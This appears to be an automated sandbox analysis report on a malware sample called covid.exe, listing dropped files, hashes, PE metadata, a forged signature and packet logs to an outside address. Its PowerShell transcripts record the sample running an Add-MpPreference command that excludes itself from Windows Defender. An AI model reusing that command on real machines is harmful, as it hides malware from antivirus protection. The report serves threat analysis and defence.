                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230005..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230005..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230526..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.kuWr1X7Z.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.359309757879457
                                                                Encrypted:false
                                                                SSDEEP:96:BZp6qZN4z3qDo1ZVCZO6qZN4z3qDo1ZWMyOyUyjZS6qZN4z3qDo1ZqJyEyEykZ2:4s+x
                                                                MD5:21CE8E1B82258946100644140B7013C5
                                                                SHA1:619FF53A089FA62422ABC029F72C14667F6D749F
                                                                SHA-256:C38AF2408E89FDF430986EC182AFEA49CD22E63B23649D142256895FC1EA7188
                                                                SHA-512:9B37B7B06EC5E9FD029B56FE9214AFA38A208E312A8F78E6465D2B25010E1602CD82AEB022F7F8655F0385EBF8661643C4E22F2C9042247B525DE8FF58C41721
                                                                Malicious:false
                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230002..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230002..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230320..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwm
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):2679790
                                                                Entropy (8bit):3.071546356466385
                                                                Encrypted:false
                                                                SSDEEP:12288:HOgjCfV50UYJ9zyVM8f92Ev+EZBQth8tCFiAdA9JW21OgjCfV50UYJ9zyVM8f92T:HdNYRXv6iT1dNYRXv6iTS
                                                                MD5:1F6602BC19F05B583F8EC310007B038B
                                                                SHA1:F7DC5C858BEBD19F80EF0969308758283D4B5B56
                                                                SHA-256:85709EC49736BD005624D4B542222DAAE924D277AD468B21FF2775674CEEE5CA
                                                                SHA-512:69D60D9F5BFA84BA3664B6E135739A5FE3F52C2F5F0C7FF88B4A2198CE8C257251B5EA74514460CA24E46098BA0136AE9F7330E7522849B2A749CBF6FBC34356
                                                                Malicious:false
                                                                Preview: SS Of yQQ f F f f f Q f f f exx exx f f yCQ f f f f f f f wQ f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f yeC f f f yQ Fy yCw yQ f yCf O efx FF yCQ y Sw efx FF CQ yfQ yfx yyx Fe yye yyQ yyy yfF yyQ OS yfO Fe OO OS yyf yyf yyy yyw Fe OC yfy Fe yyQ yyS yyf Fe yfx yyf Fe wC SO CF Fe yfO yyy yff yfy Qw yF yF yf Fw f f f f f f f Cf wO f f Sw y F f OS yFC yxC eew f f f f f f f f eeQ f FQ f yy y Cf f f we C f f w f f f f f f eFC OF C f f Fe f f f Ow C f f f f yw f Fe f f f e f f Q f f f f f f f w f f f f f f f f ywf C f f e f f f f f f e f Ow yFF f f yw f f yw f f f f yw f f yw f f f f f f yw f f f f f f f f f f f yxe OF C f CF f f f f Ow C f CC F f f f f f f f f f f f f f f f f f f f yeC C f ye f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f Fe f f C f f f f f f f f f f f C Fe f f Se f f f f f f f f f f f Qw yyw yfy yef yyw f f f eQQ wy C f f Fe f f f we C f f e f f f f f f f f f f f f f f Fe f f Ow Qw yyQ yyx y

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.605387718409897
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:covid.exe
                                                                File size:39624
                                                                MD5:99e3b458dee79b33209d39d19692ae08
                                                                SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
                                                                SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0
                                                                SHA512:79c087ff41871e03523feee4eee606f27bc59c5213c259df713f1fc0bc860b7846757136ce8b9a9755210aa38192c813eb87131afcaa18c5dec0b5d70060a3a4
                                                                SSDEEP:384:6pJWGVGYxA5sJ8wCo9GTqsm3bdioR+BA8Z/itiB6j4lsTgR8engVEWfNpi/wOpzA:0LX9XbdM56wWoyey/Vcrpti6lhMx
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@............."...0..|............... ........@.. ...............................'....@................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x409ace
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 4/19/2021 9:43:47 AM 4/19/2022 9:43:47 AM
                                                                Subject Chain
                                                                • C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Version:3
                                                                Thumbprint MD5:05B1F24EB4299E74171523A6BAE99247
                                                                Thumbprint SHA-1:9220EF39055DD6D18D9B7A41230CEAA4F76B5358
                                                                Thumbprint SHA-256:41523B79D33BAD1F3D99CB31EEABD79B3B6F28E870E01800A08B4C5B36B5FEEF
                                                                Serial:00B8BEE23D8FB88CA889DAD9E6D2F8C69D

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9a780x53.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x588.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x86000x14c8.text
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc0000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x7ad40x7c00False0.413904989919data5.18958268075IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc0xa0000x5880x600False0.412109375data4.00563976551IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0xc0000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountry
                                                                RT_VERSION0xa0a00x2fcdata
                                                                RT_MANIFEST0xa39c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLLImport
                                                                mscoree.dll_CorExeMain

                                                                Version Infos

                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                LegalCopyrightCopyright 2021
                                                                Assembly Version1.0.0.0
                                                                InternalNameahmed.exe
                                                                FileVersion1.0.0.0
                                                                CompanyName
                                                                LegalTrademarks
                                                                Comments
                                                                ProductNameahmed
                                                                ProductVersion1.0.0.0
                                                                FileDescriptionahmed
                                                                OriginalFilenameahmed.exe

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 20, 2021 22:59:11.631361008 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.684120893 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.684290886 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.684930086 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.737579107 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937634945 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937678099 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937705040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937730074 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937752008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937766075 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.937773943 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937797070 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:11.937799931 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:11.937844992 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.198029995 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198069096 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198093891 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198117971 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.198215961 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.199172974 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.199203968 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.199322939 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.200407982 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.200443983 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.200520039 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.201627970 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.201658010 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.201726913 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.202872038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.202903032 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.202970028 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.204102993 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.204137087 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.204205036 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.205338955 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.205370903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.205456018 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.206574917 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.206608057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.206665993 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.207807064 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.207839012 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.207930088 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.209031105 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.209063053 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.209140062 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.210285902 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.210319996 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.210378885 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.211505890 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.211539030 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.211630106 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.212704897 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.212738037 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.212824106 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.213963985 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.213995934 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.214071989 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.215200901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.215233088 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.215316057 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.216418028 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.216451883 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.216502905 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.217673063 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.217705011 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.217761993 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.218903065 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251354933 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251394033 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251491070 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.251885891 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251910925 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.251960039 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.253123045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.253155947 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.253201008 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.254389048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254422903 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.254458904 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.255589008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255621910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.255660057 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.256850004 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256885052 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.256927013 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.258069992 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258120060 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.258141994 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.259304047 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259340048 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.259386063 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.260538101 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260572910 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.260629892 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.261760950 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261797905 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:12.261840105 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:12.263015985 CEST8049702172.67.220.147192.168.2.7

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 20, 2021 22:59:03.480581045 CEST6124253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:03.537749052 CEST53612428.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:03.765964985 CEST5856253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:03.825591087 CEST53585628.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:03.973659039 CEST5659053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:04.027196884 CEST53565908.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:04.445034027 CEST6050153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:04.494206905 CEST53605018.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:05.320496082 CEST5377553192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:05.372695923 CEST53537758.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:06.156315088 CEST5183753192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:06.219965935 CEST53518378.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:06.284997940 CEST5541153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:06.333602905 CEST53554118.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:07.662137032 CEST6366853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:07.710809946 CEST53636688.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:08.576298952 CEST5464053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:08.625125885 CEST53546408.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:09.513241053 CEST5873953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:09.571078062 CEST53587398.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:11.542737961 CEST6033853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:11.605129004 CEST53603388.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:11.752775908 CEST5871753192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:11.812586069 CEST53587178.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:13.555123091 CEST5976253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:13.605463982 CEST53597628.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:14.283757925 CEST5432953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:14.332566023 CEST53543298.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:15.263148069 CEST5805253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:15.311777115 CEST53580528.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:16.190433979 CEST5400853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:16.239104986 CEST53540088.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:17.707003117 CEST5945153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:17.755932093 CEST53594518.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:18.667550087 CEST5291453192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:18.728842020 CEST53529148.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:19.731760979 CEST6456953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:19.791662931 CEST53645698.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:20.680387020 CEST5281653192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:20.738553047 CEST53528168.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:21.992486954 CEST5078153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:22.041332960 CEST53507818.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:22.905011892 CEST5423053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:22.953547955 CEST53542308.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:23.989623070 CEST5491153192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:24.048361063 CEST53549118.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:24.995657921 CEST4995853192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:25.044671059 CEST53499588.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:27.789151907 CEST5086053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:27.848284006 CEST53508608.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:27.879282951 CEST5045253192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:27.927898884 CEST53504528.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:29.292191029 CEST5973053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:29.350326061 CEST53597308.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:49.660680056 CEST5931053192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:49.711036921 CEST53593108.8.8.8192.168.2.7
                                                                Apr 20, 2021 22:59:58.639651060 CEST5191953192.168.2.78.8.8.8
                                                                Apr 20, 2021 22:59:58.700697899 CEST53519198.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:27.371499062 CEST6429653192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:27.435833931 CEST53642968.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:32.092233896 CEST5668053192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:32.153212070 CEST53566808.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:43.199078083 CEST5882053192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:43.259835005 CEST53588208.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:56.495156050 CEST6098353192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:56.548681974 CEST53609838.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:57.553138018 CEST4924753192.168.2.78.8.8.8
                                                                Apr 20, 2021 23:00:57.713815928 CEST53492478.8.8.8192.168.2.7
                                                                Apr 20, 2021 23:00:58.205868959 CEST5228653192.168.2.78.8.8.8
